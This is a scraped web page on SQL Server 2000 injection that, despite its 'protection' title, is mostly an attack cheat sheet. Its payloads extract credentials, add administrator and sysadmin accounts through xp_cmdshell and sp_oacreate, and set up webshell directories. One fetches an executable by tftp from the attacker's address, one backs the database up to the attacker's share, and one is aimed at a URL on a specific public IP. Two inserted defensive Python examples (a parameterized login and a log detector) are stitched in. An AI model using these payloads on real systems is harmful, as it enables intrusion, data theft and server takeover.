SQL Server 2000 Injection Protection (1)

Source: Internet
Author: User
Tags: odbc connection


SQL injection started from the classic payload ' or '1'='1
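As an added example (not code from the original page), the classic payload above against a login query that concatenates user input, beside the parameterized form that defeats it. The users table and rows are constructed for the demo, and SQLite stands in for SQL Server; the injection mechanics are the same.

```python
import sqlite3

def make_db():
    # Constructed sample schema and rows (not from the page) so the example runs offline.
    db = sqlite3.connect(":memory:")
    db.execute("create table users (id integer, username text, password text, privs integer)")
    db.executemany("insert into users values (?, ?, ?, ?)",
                   [(1, "admin", "s3cret", 1), (2, "rahul", "hunter2", 0)])
    return db

def login_vulnerable(db, username, password):
    # The flaw behind ' or '1'='1: input is pasted into the SQL text, so a quote in the
    # input closes the literal and the injected condition makes the WHERE clause always true.
    sql = ("select username from users where username = '" + username +
           "' and password = '" + password + "' order by id")
    return [row[0] for row in db.execute(sql)]

def login_parameterized(db, username, password):
    # Hardened form: placeholders send the values separately from the query text,
    # so quotes and keywords in the input remain plain data.
    sql = "select username from users where username = ? and password = ? order by id"
    return [row[0] for row in db.execute(sql, (username, password))]

CLASSIC_PAYLOAD = "' or '1'='1"
```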

The most important table names:

select * from sysobjects
sysobjects, ncsysobjects
sysindexes, tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses

The most important user names (present in a default SQL Server database):

public
dbo
guest (usually disabled or without permissions)
db_securityadmin
db_ddladmin

Some default extended stored procedures:

xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia: drives
xp_dirtree: directory tree
xp_enumdsn: ODBC data sources
xp_loginconfig: server security mode information
xp_makecab: creates a compressed archive
xp_ntsec_enumdomains: domain information
xp_terminate_process: terminates a process, given its PID

For example:

sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
exec xp_webserver
sp_dropextendedproc 'xp_webserver'
bcp "select * from test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
' group by users.id having 1=1--
' group by users.id, users.username, users.password, users.privs having 1=1--
'; insert into users values (666, 'attacker', 'foobar', 0xffff)--

union select top 1 COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'logintable'--
union select top 1 COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'logintable' and COLUMN_NAME not in ('login_id')--
union select top 1 COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'logintable' and COLUMN_NAME not in ('login_id', 'login_name')--
union select top 1 login_name from logintable--
union select top 1 password from logintable where login_name = 'rahul'--

Constructed statements (including a check for whether xp_cmdshell exists):

' union select @@version, 1, 1--
and 1=(select @@version)
and 'sa'=(select system_user)
' union select ret, 1, 1 from foo--
' union select min(username), 1, 1 from users where username > 'a'--
' union select min(username), 1, 1 from users where username > 'admin'--
' union select password, 1, 1 from users where username = 'admin'--
and user_name() = 'dbo'
and 0<>(select user_name())--
; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\WINNT\system32\cmd.exe /C net user swap 5245886 /add'
and 1=(select count(*) from master.dbo.sysobjects where xtype = 'X' and name = 'xp_cmdshell')
; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'

1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='X'%20and%20name='xp_cmdshell')
and 1=(select IS_SRVROLEMEMBER('sysadmin'))   (checks whether the current login has sysadmin, i.e. sa-level, permission)
and 0<>(select top 1 paths from newtable)   (database exposure)
and 1=(select name from master.dbo.sysdatabases where dbid = 7)   (gets a database name; dbid 1 to 5 are the system databases, 6 and above can be probed)

Create a virtual directory for the E: drive:

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "Default Web Site" -v "e","e:\"'
Set its access permissions (used together with writing a webshell):
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'

and 0<>(select count(*) from master.dbo.sysdatabases where name > 1 and dbid = 6)
Change the dbid value (..., 9, and so on) to get more database names.
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype = 'U')   (exposes a table name; assume it is admin)

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype = 'U' and name not in ('admin'))   (gets the other tables)
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype = 'U' and name = 'admin' and uid > (str(id)))   (exposes the uid; assume it is 18779569, where uid = id)
and 0<>(select top 1 name from bbs.dbo.syscolumns where id = 18779569)   (gets a column of admin; assume it is user_id)
and 0<>(select top 1 name from bbs.dbo.syscolumns where id = 18779569 and name not in ('id', ...))   (exposes the other columns)
and 0<(select user_id from bbs.dbo.admin where username > 1)

The user names can be obtained one by one in the same way, and then the passwords. This assumes that columns such as user_id, username and password exist.

show.asp?id=-1 union select 1,2,4,5,6,7,8,9,10,11,12,13,* from admin
show.asp?id=-1 union select 1,2,4,5,6,7,8,*,9,10,11,12,13 from admin

(Union statements are usable almost everywhere; they also work well against Access.)

Special database-exposure trick: %5c is the URL encoding of '\'; submit it in place of / or \ in the path.

and 0<>(select count(*) from master.dbo.sysdatabases where name > 1 and dbid = 6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype = 'U')
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype = 'U' and name not in ('address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype = 'U' and name = 'admin' and uid > (str(id)))   (determines the id value)
and 0<>(select top 1 name from bbs.dbo.syscolumns where id = 773577794)   (all columns)

http://xx.xx.xx.xx/111.asp?id=3400; create table [dbo].[swap] ([swappass] [char](255));--

http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap) = 1
; create table newtable (id int identity(500), paths varchar()) declare @test varchar(20) exec master..xp_regread @rootkey = 'HKEY_LOCAL_MACHINE', @key = 'System\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name = '/', values = @test output insert into paths (path) values (@test)

http://61.131.96.39/PageShow.asp?TianName=Policy and Regulation&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08}; use%20master; declare%20@s%20int; exec%20sp_oacreate%20"wscript.shell",@s%20out; exec%20sp_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";--

The web path d:\xxxx is obtained. Next:

http://xx.xx.xx.xx/111.asp?id=3400; use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400; create table cmd (str image);--

The traditional test process with xp_cmdshell:

; exec master..xp_cmdshell 'dir'
; exec master.dbo.sp_addlogin hax;--
; exec master.dbo.sp_password null, hax, hax;--
; exec master.dbo.sp_addsrvrolemember hax sysadmin;--
; exec master.dbo.xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
; exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
http://www.xxx.com/list.asp?classid=1; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\WINNT\system32\cmd.exe /C net user swap 5258 /add'
; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\WINNT\system32\cmd.exe /C net localgroup administrators swap /add'

http://localhost/show.asp?id=1'; exec master..xp_cmdshell 'tftp -i yourip get file.exe'--

declare @a sysname set @a = 'xp_' + 'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a = 'xp' + '_cm' + 'dshell' exec @a 'dir c:\'
; declare @a sysname; set @a = db_name(); backup database @a to disk = '\\<your IP address>\<your shared directory>\bak.dat'
If that is restricted, the following can be used instead:
select * from openrowset('sqloledb', 'server'; 'sa'; '', 'select ''OK!'' exec master.dbo.sp_addlogin hax')
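As an added example (not code from the original page), a small detector for the probes catalogued above as they appear in IIS W3C log lines: it undoes the URL encoding (%20, %5c, and double encoding), collapses the 'xp'+'_cm'+'dshell' string-splitting trick, and then matches the catalogue reads, extended procedures, UNION extraction and stacked-query prefixes listed on this page. The log lines, client IPs and paths are constructed for the demo.

```python
import re
from urllib.parse import unquote

# Signatures drawn from the probes on this page: system-catalogue reads, extended/OLE
# procedures, UNION-based extraction and the stacked-query prefix.
SIGNATURES = {
    "catalog_probe": re.compile(
        r"\b(sysobjects|syscolumns|sysdatabases|sysxlogins|information_schema)\b", re.I),
    "extended_proc": re.compile(
        r"\b(xp_cmdshell|xp_regread|xp_dirtree|sp_oacreate|sp_oamethod|"
        r"sp_addextendedproc|sp_addlogin|sp_addsrvrolemember|openrowset)\b", re.I),
    "union_probe": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "stacked_query": re.compile(r";\s*(exec|declare|create|use|insert)\b", re.I),
}

def normalise(value, max_rounds=3):
    """Undo URL encoding (repeatedly, for double-encoded input) and literal concatenation."""
    for _ in range(max_rounds):          # decode until the text stops changing
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"'\s*\+\s*'", "", value)   # 'xp'+'_cm'+'dshell' -> 'xp_cmdshell'

def classify(query_string):
    """Return the sorted names of every signature that matches the normalised query."""
    text = normalise(query_string)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan_iis_log(lines):
    """Return (client_ip, uri_stem, hits) for W3C log lines whose cs-uri-query matches."""
    findings = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 6:   # skip directives, blanks, short lines
            continue
        ip, uri, query = fields[2], fields[4], fields[5]
        hits = classify(query)
        if hits:
            findings.append((ip, uri, hits))
    return findings

# Constructed sample log (fields: date time c-ip cs-method cs-uri-stem cs-uri-query); not real traffic.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query
2004-05-01 10:00:01 10.0.0.5 GET /show.asp id=1
2004-05-01 10:00:02 10.0.0.9 GET /show.asp id=-1%20union%20select%201,2,3%20from%20admin
2004-05-01 10:00:03 10.0.0.9 GET /111.asp id=3400;exec%20master..xp_cmdshell%20'dir'--
2004-05-01 10:00:04 10.0.0.9 GET /show.asp id=1%20and%201=(select%20count(*)%20from%20master.dbo.sysobjects%20where%20name='xp'%2B'_cm'%2B'dshell')
""".splitlines()
```

Run scan_iis_log over a real cs-uri-query column only after checking the field order in the log's #Fields directive, since IIS lets administrators reorder the columns.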
